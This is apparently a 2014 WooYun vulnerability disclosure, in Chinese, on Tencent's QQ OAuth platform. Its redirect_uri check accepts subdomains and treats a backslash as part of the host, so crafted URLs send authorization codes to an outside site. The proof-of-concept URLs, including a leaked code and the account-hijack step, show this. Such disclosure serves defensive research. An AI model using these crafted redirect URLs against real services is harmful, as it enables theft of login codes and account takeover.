提交时间:2014-05-04 17:25
公开时间:2014-06-18 17:26
漏洞类型:应用配置错误
危害等级:中
自评Rank:10
漏洞状态:
厂商已经确认
漏洞来源:http://www.wooyun.org
Tags标签:
无
漏洞详情
披露状态:
2014-05-04:细节已通知厂商并且等待厂商处理中
2014-05-04:厂商已经确认,细节仅向厂商公开
2014-05-14:细节向核心白帽子及相关领域专家公开
2014-05-24:细节向普通白帽子公开
2014-06-03:细节向实习白帽子公开
2014-06-18:细节向公众公开
专职打脸 http://weibo.com/1363173330/B2Jsz8Wl9
详细说明:缺陷1:
经过测试发现,如果一个应用的回调域是www.a.com的,授权平台是允许其跳转到以www.a.com为基域的其他子域的,比如sub.www.a.com(但是sub.a.com)是不行的.
缺陷2:
腾讯授权平台对于URL域的判断没有考虑一些浏览器的特性,比如在url中存在\时,大多数浏览器是会将其变为/. 因此,授权平台认为www.baidu.com\.www.a.com也是一个www.a.com的子域,而浏览器实际确是跳转到www.baidu.com/.www.a.com, 从而引起token/code的泄露.
PoC:
http://openapi.qzone.qq.com/oauth/show?which=Login&display=pc&response_type=code&client_id=100263567&redirect_uri=http://www.baidu.com%5C.security.tencent.com/index.php/sign/qq_callback&scope=get_user_info,add_pic_t,add_t
登录情况下:
目标停留5秒钟即可自动获取到授权,无需点击
http://openapi.qzone.qq.com/oauth/show?which=Login&display=pc&response_type=code&client_id=100263567&redirect_uri=http://www.baidu.com%5C.security.tencent.com/index.php/sign/qq_callback&scope=get_user_info,add_pic_t,add_t
跳转到可控站点,泄漏code
http://www.baidu.com%5c.security.tencent.com/index.php/sign/qq_callback?code=B9671172B18275C408EE3ED**
利用泄漏的code即可直接劫持
http://security.tencent.com/index.php/sign/qq_callback?code=B9671172B18275C408EE3ED**
就是这么个过程。
修复方案:
版权声明:转载请注明来源 p.z@乌云 漏洞回应 厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2014-05-04 19:57
厂商回复:非常感谢您的报告,问题已着手处理,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理。
最新状态:暂无